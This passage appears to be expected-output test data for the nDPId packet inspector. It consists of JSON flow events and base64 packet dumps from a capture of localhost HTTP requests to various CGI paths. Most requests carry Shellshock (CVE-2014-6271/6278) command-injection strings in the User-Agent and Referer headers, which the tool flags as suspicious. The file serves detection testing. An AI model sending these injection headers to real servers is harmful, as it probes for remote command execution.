Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1576420277454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277454,"pkt":"AAAAAAAAAAAAAAAACABFAAEJpZBAAEAGllx\/AAABfwAAAcVoH5CGpZ1eF0nj7YAYAED+\/QAAAQEICp1m\/fadZv32R0VUIC90ZXN0LmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1576420277455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277455,"pkt":"AAAAAAAAAAAAAAAACABFAAENkNNAAEAGqxV\/AAABfwAAAcVqH5AR5agGdIx514AYAED\/AQAAAQEICp1m\/fedZv33R0VUIC90ZXN0X2NnaS5waHAgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1576420277458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277458,"pkt":"AAAAAAAAAAAAAAAACABFAAENOM9AAEAGAxp\/AAABfwAAAcVsH5CGwwAaI+XJXIAYAED\/AQAAAQEICp1m\/fqdZv36R0VUIC90ZXN0LmNnaS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1576420277459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277459,"pkt":"AAAAAAAAAAAAAAAACABFAAEMfPpAAEAGvu9\/AAABfwAAAcVuH5CbL0QudOlGT4AYAED\/AAAAAQEICp1m\/fudZv37R0VUIC90ZXN0X2NnaS5wbCBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1576420277460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277460,"pkt":"AAAAAAAAAAAAAAAACABFAAEMyD1AAEAGc6x\/AAABfwAAAcVwH5BPvfDvcLTsqIAYAED\/AAAAAQEICp1m\/fydZv38R0VUIC90ZXN0LWNnaS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1576420277462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277462,"pkt":"AAAAAAAAAAAAAAAACABFAAEIoLlAAEAGmzR\/AAABfwAAAcVyH5A1vJhjWIrHxIAYAED+\/AAAAQEICp1m\/f2dZv39R0VUIC90ZXN0LnB5IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1576420277463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277463,"pkt":"AAAAAAAAAAAAAAAACABFAAEILLBAAEAGDz5\/AAABfwAAAcV0H5AN6xR8l7l+o4AYAED+\/AAAAQEICp1m\/f+dZv3+R0VUIC90ZXN0LnNoIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1576420277464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277464,"pkt":"AAAAAAAAAAAAAAAACABFAAEOUvlAAEAG6O5\/AAABfwAAAcV2H5BXVWoitNrsWoAYAED\/AgAAAQEICp1m\/gCdZv4AR0VUIC90bVVuYmxvY2suY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tmUnblock.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1576420277465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277465,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgUVAAEAGuqZ\/AAABfwAAAcV4H5AZ0bmWzQ36cYAYAED+\/gAAAQEICp1m\/gGdZv4BR0VUIC91bmFtZS5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uname.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1576420277466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277466,"pkt":"AAAAAAAAAAAAAAAACABFAAEM2vpAAEAGYO9\/AAABfwAAAcV6H5AtBOIv4uMLlYAYAED\/AAAAAQEICp1m\/gKdZv4CR0VUIC92aWV3Y3ZzLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} 
